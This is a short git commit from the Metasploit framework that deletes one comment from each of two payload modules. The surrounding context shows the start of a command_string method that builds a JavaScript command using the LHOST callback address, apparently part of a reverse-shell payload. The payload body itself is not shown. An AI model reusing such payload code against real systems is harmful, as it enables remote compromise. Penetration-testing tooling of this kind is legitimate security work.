Kill unnecessary comment.

bug/bundler_fix
Joe Vennix 2013-09-16 21:35:53 -05:00
parent 5fc724bced
commit a641bc41a8
2 changed files with 0 additions and 2 deletions

View File

@ -48,7 +48,6 @@ module Metasploit3
# Returns the JS string to use for execution
#
def command_string
# Does anyone know of a concise way to tell if we're running on windows so that we spawn cmd?
lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
cmd = <<EOS
(function(){

View File

@ -45,7 +45,6 @@ module Metasploit3
# Returns the JS string to use for execution
#
def command_string
# Does anyone know of a concise way to tell if we're running on windows so that we spawn cmd?
lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
cmd = <<EOS
(function(){